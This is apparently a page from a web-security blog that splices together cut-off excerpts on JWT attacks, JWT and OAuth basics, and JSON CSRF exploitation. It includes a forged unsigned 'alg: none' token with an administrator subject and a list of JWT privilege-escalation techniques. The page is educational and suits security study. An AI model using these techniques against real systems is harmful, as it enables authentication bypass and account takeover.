Lazy Hacker

Modify the algorithm to none Change the  “alg”: “none”  and also delete the signature part but remember to leave the trailing dot after the payload and send the request to see if the none algorithm is working or not. Example:  eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2NTY0MTczNDJ9. Header:   eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0 {  “typ”: “JWT”,  “alg”: “none” } Payload:  eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2NTY0MTczNDJ9 {  “iss”: “portswigger”,  “sub”: “administrator”,  “exp”: 1656417342 } References: https://portswigger.net/web-security/jwt https://jwt.io/  

  JWT vulnerabilities: Tamper without modifying anything Modify the algorithm to none Bruteforce weak signing key Privilege Escalation by JWK header injection (RS256 or asymmetric hashing algorithm attack) Privilege Escalation by JKU header injection (RS256 or asymmetric hashing algorithm attack) The exploitation of kid header in JWT (Directory Traversal and command Injection) (RS256 and HS256) Privilege Escalation by algorithm confusion when server public key is exposed and JWT token algorithm is RS256(Change the algorithm from RS256 or asymmetric hashing algorithm attack to HS256 or symmetric algorithm) Privilege Escalation by algorithm confusion when server public key is not exposed and JWT token algorithm is RS256(Change the algorithm from RS256 or asymmetric hashing algorithm attack to HS256 or symmetric algorithm) Cross service relay attack Check exp Tamper without modifying anything Change the value in the payload and check if the signature is validating at the server end or no

The basic sequence of getting tokens is as follows: A client sends a username/password combination to the server. The server validates the authentication. If authentication is successful, the server creates a JWT token and refresh token else establishes an error response. On successful authentication, the client gets a JWT token in the response body and a refresh token in the cookie with all cookie protection flags like (httpOnly, secure=true, and SameSite=strict flag [whenever possible to prevent CSRF]). The client stores the access token in-memory. It means that you put this access token in a variable in your front-end site (like const accessToken = xyz). Yes, this means that the access token will be gone if the user switches tabs or refreshes the site. That’s why we have the refresh token. We’re not putting this access token in localStorage or cookie via JavaScript because it’s easier for attackers to dump that data, making it more prone to be stolen via an XSS attack. We can also u

What is JWT? JWT token is a base64url encoded string that is used to transmit the information between server and client. JWT token mostly contains the user information which is used for authorization. JWT token can be sent through a URL, POST parameter, and HTTP header. The information that is sent by JWT is verified and trusted because it is digitally signed .  JWT token looks like: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 . eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ . SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c JWT token has three parts: https://jwt.io/ Header: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 {“alg”: “HS256”,”typ”: “JWT”} Payload: eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ {“sub”: “1234567890”,”name”: “John Doe”,”iat”: 1516239022} Signature: SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c HMACSHA256(base64UrlEncode(header) + “.” +base64UrlEncode(payload), your-secret) Uses of JWT token * Authorization: After successful auth

I was also confused while understanding both concepts, I thought that the Gmail/Facebook credentials that I used to login into abc.com is an OAuth concept but I was wrong. It is the OpenID concept that is working on the OAuth protocol.  So What is OAuth? OAuth = Open Authorization As the name suggests it is “Authorization” which means it’s related to some authorization concept. As the internet grows, the developer needs some concept so that “abc.com” can read the data from “anything.com” without giving the password of anything .com to the abc.com server. It helps in improving the user experience and also increases the business. Let’s explain an OAuth by a simple example: I am sure, we all have seen this type of concept, where we logged into an application (abc.com) by using abc.com credentials and after that, we get the option like import contacts from Gmail. When we click on that hyperlink, it redirects us to Gmail, where it asks for Gmail credentials, and after entering the credentia

  How JSON CSRF can be exploitable? The JSON CSRF can be exploited in four ways depending on other factors that we will discuss: By using normal HTML Form1: When  Content-Type  is not validating at the server-side and also not checking for the POST data if it’s correctly formatted or not. By using normal HTML Form2 (By Fetch Request): When  Content-Type  is not validating at the server-side and only checking for the POST data if it’s correctly formatted or not. By using XMLHTTP Request/AJAX request: When  Content-Type  is validating at the server-side and the server accepts only “ Content-Type: application/json” By using Flash file: When  Content-Type  is validating at the server-side and the server accepts only “ Content-Type: application/json”  and CORS is also configured properly Case1:  When Content-Type is not validating at the server-side and also not checking for the POST data if it’s correctly formatted or not. Why do we need to check by changing the Content-Type? Because we ca